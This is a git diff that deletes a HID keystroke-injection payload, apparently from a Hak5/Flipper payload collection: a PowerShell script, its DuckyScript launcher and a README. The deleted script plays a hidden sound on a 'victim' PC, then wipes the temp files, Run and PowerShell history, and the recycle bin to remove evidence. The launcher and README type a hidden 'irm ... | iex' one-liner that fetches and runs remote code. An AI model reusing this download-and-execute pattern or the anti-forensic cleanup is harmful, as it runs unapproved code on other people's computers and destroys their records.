diff --git a/Payloads/Flip-Play-WAV/Play-WAV.ps1 b/Payloads/Flip-Play-WAV/Play-WAV.ps1 deleted file mode 100644 index 983538d..0000000 --- a/Payloads/Flip-Play-WAV/Play-WAV.ps1 +++ /dev/null @@ -1,93 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.NOTES - This script requires you to have a DropBox account or another file hosting service - -.DESCRIPTION - This program downloads a sound from your DropBox - Turns the volume to max level on victims PC - Pauses the script until a mouse movement is detected - Then plays the sound with nothing popping up catching your victim off guard - Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history - -#> - -############################################################################################################################################################ - -# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1") -# This is for if you want to host your own instance of this script - -#$wav = "" - -iwr $wav -O $env:TMP\e.wav - -############################################################################################################################################################ - -# This turns the volume up to max level -$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)} - -############################################################################################################################################################ - -# This while loop will constantly check if the mouse has been moved -# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off -# it will then sleep for the indicated number of seconds and check again - -Add-Type -AssemblyName System.Windows.Forms -$originalPOS = [System.Windows.Forms.Cursor]::Position.X - - while (1) { - $pauseTime = 3 - if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ - break - } - else { - $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime - } - } -############################################################################################################################################################ - -# Play Sound -$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync() - -############################################################################################################################################################ - -<# - -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue - diff --git a/Payloads/Flip-Play-WAV/Play-WAV.txt b/Payloads/Flip-Play-WAV/Play-WAV.txt deleted file mode 100644 index 2b25a3c..0000000 --- a/Payloads/Flip-Play-WAV/Play-WAV.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: Play-WAV -REM -REM Author: I am Jakoby -REM -REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details -REM -REM Target: Windows 10, 11 -REM -REM Remeber to replace the link with your link for the intended file to download -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly -REM -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex -DELAY 500 -ENTER diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md deleted file mode 100644 index 17ae6b9..0000000 --- a/Payloads/Flip-Play-WAV/README.md +++ /dev/null @@ -1,114 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# Play-WAV - -A script used to download a WAV file and play it after a mouse movement is detected. - -## Description - -This program starts off by using an Invoke-WebRequest to download a WAV file. -The system volume is then turned up to the max level. -Then the script will be paused until a mouse movement is detected. -After a mouse movement is detected, the WAV file will be played. - -## Getting Started - -### Dependencies - -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Place the WAV URL in the $wav variable -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download your WAV file - -``` -powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Golang - -
Instagram - 		- - Jsonnet - -
Discord - 		- - Jsonnet - -
TikTok -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - - -

(back to top)